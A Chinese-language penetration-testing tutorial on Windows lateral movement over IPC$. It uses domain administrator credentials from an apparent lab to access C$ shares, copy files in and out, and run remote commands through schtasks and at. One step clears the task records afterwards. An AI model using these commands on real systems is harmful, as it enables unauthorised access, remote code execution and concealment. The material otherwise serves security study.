IPC(共享命名管道资源)其实就是为了实现进程间通信⽽开放的命名管道;IPC可以通过验证⽤户名和密码 获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使⽤。

IPC的利⽤条件

*  开启了139、445端⼝ 
* ipc$可以实现远程登录及对默认共享资源的访问,⽽139端⼝的开启表示NetBIOS协议的应⽤。 通过139、445端⼝可以实现对共享⽂件/打印机的访问。⼀般来讲IPC$需要139、445端⼝的⽀持 。
*  管理员开启了默认共享 。
*  默认共享是为了⽅便管理员进⾏远程管理⽽默认开启的,包括所有的逻辑盘(c$,d$,e$)等,和系统⽬录winnt或 windows(admin$)。通过IPC$可以实现对这些默认共享⽬录的访问。
* 首先需要一个域管理员的账号

建⽴ IPC 连接(查看、上传、下载⽂件)

1、建⽴ IPC

`net use \\10.10.10.10 /u:de1ay\administrator 1qaz@WSX`


如果想要删除 IPC 连接的话就使⽤命令:
net use \\10.10.10.10 /de /y
2、查看⽬标的共享磁盘
net view \\10.10.10.10

3、查看⽬标 C 盘下的⽂件

若是想要查看⽬标 C 盘下的ip.txt ⽂件就可以使⽤ type 命令:
Type \\10.10.10.10\c$\ip.txt

4、上传⽂件到⽬标 C 盘
命令格式
copy 要上传的⽂件名 \\10.10.10.10\c$\
copy 1.txt \\10.10.10.10\c$\

5、下载⽬标 C 盘下的 ip.txt ⽂件
copy \\10.10.10.10\c$\ip.txt

列出远程主机的进程列表:tasklist

/S : 指定连接到的计算机或IP地址,默认本机 
/u [\] : 指定使⽤哪个⽤户执⾏这个命令。 
/P [password] : 为指定的⽤户指定密码。 
tasklist /S 10.10.10.10 /U administrator /P 1qaz@WSX


查看远程主机的时间
net time \\10.10.10.10

⾼版本下的机器运⾏计划任务执⾏命令:schtasks

schtasks 命令允许管理员创建、删除、查询、更改、运⾏和中⽌本地或远程系统上的计划任务。 在 Windows 2008 及之后的操作系统⽤的计划任务命令是 schtasks。

1、创建计划任务
schtasks /create /tn test /U de1ay\administrator /P 1qaz@WSX /tr "c:\calc.bat" /sc MINUTE /mo 1 /s 10.10.10.12 /RU system
2、执行计划任务
schtasks /run /tn test /s 10.10.10.12 /U de1ay\administrator /P 1qaz@WSX
3、删除计划任务
schtasks /F /delete /tn test /s 10.10.10.12 /U de1ay\administrator /P 1qaz@WSX

低版本下的机器运⾏计划任务执⾏命令:at

AT 命令在 Windows 2008 以下的操作系统内置,例如 Windows 2003

语法格式:

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] 
AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"


AT [\computername] [[id][/delete][/yes]]
参数含义:

id : 分配给计划命令的识别号码,可由不带参数的 AT 命令查到。
/delete : 取消指定的计划命令,如果 id 省略的话,取消所有的计划命令。
/yes : 强制对所有的取消询问回答 yes 。

在使⽤ at 命令在远程机器上创建计划任务之前,需要使⽤ net use 命令建⽴ ipc$:
net use \\10.10.10.10 /u:de1ay\administrator 1qaz@WSX

#查看目标系统时间标系统时间
net time \\10.10.10.10
#将文件复制到⽬标系统中
copy calc.bat \\10.10.10.10\c$
#使用at创建计划任务
at \\10.10.10.10 4:45PM C:\calc.bat
#清除at记录
at \\10.10.10.10 ID /delete

#使用cmd执行命令:
at \\10.10.10.10 4:41PM cmd.exe /c "ipconfig >C:/1.txt"
#type读取文本
type \\10.10.10.10\C$\1.txt